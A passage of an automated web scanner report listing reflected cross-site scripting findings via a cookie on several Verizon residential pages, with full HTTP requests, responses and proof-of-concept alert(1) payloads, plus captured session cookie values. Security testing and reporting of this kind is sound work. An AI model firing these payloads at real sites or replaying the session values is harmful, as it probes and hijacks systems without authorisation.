<input type='hidden' id='locationInfo' value='TXB489B'><SCRIPT>ALERT(1)</SCRIPT>7FB57EC750F ' />
...[SNIP]...

1.123. http://www22.verizon.com/Residential/TV/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e0904<script>alert(1)</script>409a75cb8d7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; CP=null*; PageTitle=Livechat; vzapps=STATE=TXe0904<script>alert(1)</script>409a75cb8d7; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/aboutFiOS/Overview.htm

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76226
Expires: Sat, 20 Nov 2010 01:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe0904<script>alert(1)</script>409a75cb8d7; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:47:02 GMT; path=/residential/; domain=verizon.com

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE0904<SCRIPT>ALERT(1)</SCRIPT>409A75CB8D7 </DIV>
...[SNIP]...

1.124. http://www22.verizon.com/Residential/TV/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66838'><script>alert(1)</script>790b9be90f7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; CP=null*; PageTitle=Livechat; vzapps=STATE=TX66838'><script>alert(1)</script>790b9be90f7; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/aboutFiOS/Overview.htm

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76230
Expires: Sat, 20 Nov 2010 01:42:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:00 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX66838'><script>alert(1)</script>790b9be90f7; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:47:00 GMT; path=/residential/; domain=verizon.com

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX66838'><SCRIPT>ALERT(1)</SCRIPT>790B9BE90F7 ' />
...[SNIP]...

1.125. http://www22.verizon.com/Residential/TV/Landing.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/TV/Landing.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 945f3'><script>alert(1)</script>f63552e36b1 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/Landing.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX945f3'><script>alert(1)</script>f63552e36b1; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76257
Expires: Sat, 20 Nov 2010 01:44:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:40 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX945f3'><script>alert(1)</script>f63552e36b1; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX945F3'><SCRIPT>ALERT(1)</SCRIPT>F63552E36B1 ' />
...[SNIP]...

1.126. http://www22.verizon.com/Residential/TV/Landing.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/TV/Landing.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1e7da<script>alert(1)</script>7b9cbd1af3b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/Landing.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX1e7da<script>alert(1)</script>7b9cbd1af3b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76253
Expires: Sat, 20 Nov 2010 01:44:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1e7da<script>alert(1)</script>7b9cbd1af3b; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1E7DA<SCRIPT>ALERT(1)</SCRIPT>7B9CBD1AF3B </DIV>
...[SNIP]...

1.127. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5ef2a'><script>alert(1)</script>59d5d7b4438 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX5ef2a'><script>alert(1)</script>59d5d7b4438; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63720
Expires: Sat, 20 Nov 2010 02:14:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:14:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5ef2a'><script>alert(1)</script>59d5d7b4438; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5EF2A'><SCRIPT>ALERT(1)</SCRIPT>59D5D7B4438 ' />
...[SNIP]...

1.128. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e5f6b<script>alert(1)</script>9558a4c3976 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXe5f6b<script>alert(1)</script>9558a4c3976; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63716
Expires: Sat, 20 Nov 2010 02:14:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:14:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe5f6b<script>alert(1)</script>9558a4c3976; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE5F6B<SCRIPT>ALERT(1)</SCRIPT>9558A4C3976 </DIV>
...[SNIP]...

1.129. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 290ff'><script>alert(1)</script>35ddab62bd1 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX290ff'><script>alert(1)</script>35ddab62bd1; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65811
Expires: Sat, 20 Nov 2010 02:14:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:14:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX290ff'><script>alert(1)</script>35ddab62bd1; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX290FF'><SCRIPT>ALERT(1)</SCRIPT>35DDAB62BD1 ' />
...[SNIP]...

1.130. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a53a3<script>alert(1)</script>539276178b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXa53a3<script>alert(1)</script>539276178b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65805
Expires: Sat, 20 Nov 2010 02:14:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:14:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXa53a3<script>alert(1)</script>539276178b; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA53A3<SCRIPT>ALERT(1)</SCRIPT>539276178B </DIV>
...[SNIP]...

1.131. http://www22.verizon.com/Residential/aboutFiOS/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9615c'><script>alert(1)</script>429403f6389 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX9615c'><script>alert(1)</script>429403f6389; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70883
Expires: Sat, 20 Nov 2010 02:00:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:00:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:00:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX9615c'><script>alert(1)</script>429403f6389; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:43 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9615C'><SCRIPT>ALERT(1)</SCRIPT>429403F6389 ' />
...[SNIP]...

1.132. http://www22.verizon.com/Residential/aboutFiOS/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
